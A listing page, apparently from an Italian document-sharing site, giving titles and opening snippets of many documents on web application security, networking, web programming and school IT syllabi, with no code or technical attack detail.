Security by design. Come la gestione di un progetto può minimizzare i rischi per il business. Alessio L.R. Pennasilico - apennasilico@clusit. Security by design Come la gestione di un progetto può minimizzare i rischi per il business Alessio L.R. Pennasilico - apennasilico@clusit.it 22 Febbraio 2013 - Milano Alessio L.R. Pennasilico Security

Dettagli

Sicurezza e virtualizzazione per il cloud

Sicurezza e virtualizzazione per il cloud Sicurezza e virtualizzazione per il cloud Con il cloud gli utenti arrivano ovunque, ma la protezione dei dati no. GARL sviluppa prodotti di sicurezza informatica e servizi di virtualizzazione focalizzati

Dettagli

Banking Cybercrime: Attacchi e scenari di banking malware in Italia IEEE-DEST 2012. The OWASP Foundation. Giorgio Fedon Owasp Italy Technical Director

Banking Cybercrime: Attacchi e scenari di banking malware in Italia IEEE-DEST 2012. The OWASP Foundation. Giorgio Fedon Owasp Italy Technical Director Banking Cybercrime: Attacchi e scenari di banking malware in Italia Giorgio Fedon Owasp Italy Technical Director IEEE-DEST 2012 giorgio.fedon@owasp.org Copyright The OWASP Foundation Permission is granted

Dettagli

[1] Cross Site Scripting [2] Remote / Local File Inclusion [3] SQL Injection

[1] Cross Site Scripting [2] Remote / Local File Inclusion [3] SQL Injection ---------------------------------------------------------------------..... _/ / _ / / \ \/ / / / / \ / \ \ \ / /_/ \ /\ / \ \ \ / /_/ > Y \ \ \ >\_/ / > / \ / / \/ \/ \/ \/ / / \/ ---------------------------------------------------------------------

Dettagli

Sicurezza delle applicazioni Web

Sicurezza delle applicazioni Web Sicurezza delle applicazioni Web Sicurezza delle applicazioni web [ ] Web application security deals with the overall Web application architecture, logic, coding, and content of the Web application. In

Dettagli

Tratte da (18. TECNICHE DI ACCESSO AI DATABASE IN AMBIENTE INTERNET)

Tratte da (18. TECNICHE DI ACCESSO AI DATABASE IN AMBIENTE INTERNET) Tratte da (18. TECNICHE DI ACCESSO AI DATABASE IN AMBIENTE INTERNET) Ipotesi di partenza: concetti di base del networking Le ipotesi di partenza indispensabili per poter parlare di tecniche di accesso

Dettagli

Sicurezza e compliance delle App

Sicurezza e compliance delle App Sicurezza e compliance delle App Fabio Pacchiarotti (EY) Roma 23/04/2015 Agenda Presentazione relatore Contesto di riferimento Sicurezza delle App Aspetti di compliance Conclusioni Bibliografia & sitografia

Dettagli

McDonald's Wi-Fi Login System by BT Italia S.p.A. Multiple Vulnerabilities Report

McDonald's Wi-Fi Login System by BT Italia S.p.A. Multiple Vulnerabilities Report McDonald's Wi-Fi Login System by BT Italia S.p.A. Multiple Vulnerabilities Report Sommario Introduzione...3 Lista delle Vulnerabilità...3 Descrizione delle vulnerabilità...3 XSS...3 Captcha...4 Login...5

Dettagli

Esempi pratici, risultati e contromisure consigliate. Massimo Biagiotti

Esempi pratici, risultati e contromisure consigliate. Massimo Biagiotti L attività di un Ethical Hacker Esempi pratici, risultati e contromisure consigliate Massimo Biagiotti Information Technology > Chiunque operi nel settore sa che il panorama dell IT è in continua evoluzione

Dettagli

(UN)SECURITY GUIDELINES. Best practice e linee guida per uno sviluppo sicuro e responsabile

(UN)SECURITY GUIDELINES. Best practice e linee guida per uno sviluppo sicuro e responsabile (UN)SECURITY GUIDELINES Best practice e linee guida per uno sviluppo sicuro e responsabile $whois Paolo Stagno Cyber Security Analist, idialoghi Luca Poletti Crazy Mathematician & Developer VoidSec.com

Dettagli

Seminario sulla sicurezza delle applicazioni mobili

Seminario sulla sicurezza delle applicazioni mobili Sicurezza informatica Corso di Laurea Magistrale in Informatica Seminario sulla sicurezza delle applicazioni mobili Andrea Zwirner andrea@linkspirit.it @AndreaZwirner Seminario sulla sicurezza delle applicazioni

Dettagli

Abusing HTML 5 Client-side Storage

Abusing HTML 5 Client-side Storage Abusing HTML 5 Client-side Storage Myth: the client s machine is a safe place to store data Relatore: Alberto Trivero Client-side storage finora Limiti nello storage, nell interoperabilità e strutturali

Dettagli

Corso di Sicurezza Informatica. Sicurezza del software. Ing. Gianluca Caminiti

Corso di Sicurezza Informatica. Sicurezza del software. Ing. Gianluca Caminiti Corso di Sicurezza Informatica Sicurezza del software Ing. Gianluca Caminiti SQL Injection Sommario Premessa sul funzionamento dei siti dinamici SQL Injection: Overview Scenari di attacco: Errata gestione

Dettagli

Identity Access Management nel web 2.0

Identity Access Management nel web 2.0 Identity Access Management nel web 2.0 Single Sign On in applicazioni eterogenee Carlo Bonamico, NIS s.r.l. carlo.bonamico@nispro.it 1 Sommario Problematiche di autenticazione in infrastrutture IT complesse

Dettagli

Spett.le CRIF Via M. Fantin, 1-3 40131 Bologna

Spett.le CRIF Via M. Fantin, 1-3 40131 Bologna Spett.le CRIF Via M. Fantin, 1-3 40131 Bologna Milano, 13 Novembre 2006 n. 20061113.mb44 Alla cortese attenzione: Ing. Carlo Romagnoli Dott.ssa Elisabetta Longhi Oggetto: per Attività di Vulnerability

Dettagli

AJAX. Goy - a.a. 2006/2007 Servizi Web 1. Cos'è il Web 2.0

AJAX. Goy - a.a. 2006/2007 Servizi Web 1. Cos'è il Web 2.0 AJAX Goy - a.a. 2006/2007 Servizi Web 1 Cos'è il Web 2.0 Web 2.0 = termine introdotto per la prima volta nel 2004 come titolo di una conferenza promossa dalla casa editrice O Reilly L'idea è che ci si

Dettagli

PHP WEB DESIGNER/DEVELOPER

PHP WEB DESIGNER/DEVELOPER Dettaglio corso ID: Titolo corso: Tipologia corso: Costo totale del corso a persona (EURO): Organismo di formazione: Caratteristiche del percorso formativo PHP WEB DESIGNER/DEVELOPER Corsi di specializzazione

Dettagli

Elementi di Sicurezza e Privatezza Lezione 14 Web Security. Chiara Braghin

Elementi di Sicurezza e Privatezza Lezione 14 Web Security. Chiara Braghin Elementi di Sicurezza e Privatezza Lezione 14 Web Security Chiara Braghin Web, vulnerabilità e attacchi Attacchi comuni (2006) Cross-site scripting (XSS) 22% SQL Injection 14 % PHP Include 10% Buffer overflow

Dettagli

Protocolli e architetture per WIS

Protocolli e architetture per WIS Protocolli e architetture per WIS Web Information Systems (WIS) Un Web Information System (WIS) usa le tecnologie Web per permettere la fruizione di informazioni e servizi Le architetture moderne dei WIS

Dettagli

Indice. Prefazione. Presentazione XIII. Autori

Indice. Prefazione. Presentazione XIII. Autori INDICE V Indice Prefazione Presentazione Autori XI XIII XV Capitolo 1 Introduzione alla sicurezza delle informazioni 1 1.1 Concetti base 2 1.2 Gestione del rischio 3 1.2.1 Classificazione di beni, minacce,

Dettagli

Web Programming Specifiche dei progetti

Web Programming Specifiche dei progetti Web Programming Specifiche dei progetti Paolo Milazzo Anno Accademico 2010/2011 Argomenti trattati nel corso Nel corso di Web Programming sono state descritti i seguenti linguaggi (e tecnologie): HTML

Dettagli

VntRAS Communication Suite

VntRAS Communication Suite VntRAS Communication Suite Manuale di Riferimento 1 Indice pag. 1. Introduzione 3 2. Interfaccia web di amministrazione 4 3. Programmazione 5 4. Programmazione pagine HTML pubbliche 8 2 Introduzione Il

Dettagli

POR Calabria FSE 2007/2013 Asse II Occupabilità Obiettivo operativo D1

POR Calabria FSE 2007/2013 Asse II Occupabilità Obiettivo operativo D1 Allegato n. 2 al Capitolato speciale d appalto. ENTE PUBBLICO ECONOMICO STRUMENTALE DELLA REGIONE CALABRIA POR Calabria FSE 2007/2013 Asse II Occupabilità Obiettivo operativo D1 Procedura aperta sotto

Dettagli

venerdì 31 gennaio 2014 Programmazione Web

venerdì 31 gennaio 2014 Programmazione Web Programmazione Web WWW: storia Il World Wide Web (WWW) nasce tra il 1989 e il 1991 come progetto del CERN di Ginevra affidato a un gruppo di ricercatori informatici tra i quali Tim Berners- Lee e Robert

Dettagli

CMS Hacking. Analisi del rischio di utilizzo di applicazioni di terze parti. Gabriele Buratti www.isc2chapter-italy.it

CMS Hacking. Analisi del rischio di utilizzo di applicazioni di terze parti. Gabriele Buratti www.isc2chapter-italy.it CMS Hacking Analisi del rischio di utilizzo di applicazioni di terze parti Gabriele Buratti www.isc2chapter-italy.it Agenda Definizione di CMS Rischi e tendenze (e le ragioni di ciò) Attacchi recenti Perchè

Dettagli

WEB TECHNOLOGY. Il web connette. LE persone. E-book n 2 - Copyright Reserved

WEB TECHNOLOGY. Il web connette. LE persone. E-book n 2 - Copyright Reserved WEB TECHNOLOGY Il web connette LE persone Indice «Il Web non si limita a collegare macchine, ma connette delle persone» Il Www, Client e Web Server pagina 3-4 - 5 CMS e template pagina 6-7-8 Tim Berners-Lee

Dettagli

Lezione di Basi di Dati 1 18/11/2008 - TECNOLOGIE PER IL WEB: CGI - AJAX SERVLETS & JSP

Lezione di Basi di Dati 1 18/11/2008 - TECNOLOGIE PER IL WEB: CGI - AJAX SERVLETS & JSP EVOLUZIONE DEL WEB: PAGINE STATICHE vs PAGINE DINAMICHE Il Web è nato a supporto dei fisici, perché potessero scambiare tra loro le informazioni inerenti le loro sperimentazioni. L HTTP è nato inizialmente

Dettagli

Realizzazione di una Infrastruttura di Sicurezza

Realizzazione di una Infrastruttura di Sicurezza Realizzazione di una Infrastruttura di Sicurezza Andrea Lanzi, Lorenzo Martignoni e Lorenzo Cavallaro Dipartimento di Informatica e Comunicazione Facoltà di Scienze MM.FF.NN. Università degli Studi di

Dettagli

Architettura Connettore Alfresco Share

Architettura Connettore Alfresco Share Direzione Sistemi Informativi Portale e Orientamento Allegato n. 2 al Capitolato Tecnico Indice Architettura Connettore Alfresco Share 1. Architettura del Connettore... 3 1.1 Componente ESB... 4 1.2 COMPONENTE

Dettagli

Lezione 8 Il networking. Mauro Piccolo piccolo@di.unito.it

Lezione 8 Il networking. Mauro Piccolo piccolo@di.unito.it Lezione 8 Il networking Mauro Piccolo piccolo@di.unito.it Classificazione delle reti Ampiezza Local Area Network Metropolitan Area Networ Wide Area Network Proprieta' Reti aperte e reti chiuse Topologia

Dettagli

PROGRAMMA DI INFORMATICA

PROGRAMMA DI INFORMATICA PROGRAMMA DI INFORMATICA CLASSE 5 B Sistemi Informativi Aziendali A.S. 2014/2015 DOCENTE CORREDDU GIOVANNA ITP PANZERA GRAZIA Materiale didattico Libro di testo: Iacobelli, Ajme, Marrone, Brunetti, Eprogram-Informatica

Dettagli

Connessioni sicure: ma quanto lo sono?

Connessioni sicure: ma quanto lo sono? Connessioni sicure: ma quanto lo sono? Vitaly Denisov Contenuti Cosa sono le connessioni sicure?...2 Diversi tipi di protezione contro i pericoli del network.....4 Il pericolo delle connessioni sicure

Dettagli

Ministero dell Istruzione dell Università e della Ricerca M070 ESAME DI STATO DI ISTITUTO TECNICO INDUSTRIALE

Ministero dell Istruzione dell Università e della Ricerca M070 ESAME DI STATO DI ISTITUTO TECNICO INDUSTRIALE Pag. 1/1 Sessione ordinaria 2010 Seconda prova scritta Ministero dell Istruzione dell Università e della Ricerca M070 ESAME DI STATO DI ISTITUTO TECNICO INDUSTRIALE CORSO DI ORDINAMENTO Indirizzo: INFORMATICA

Dettagli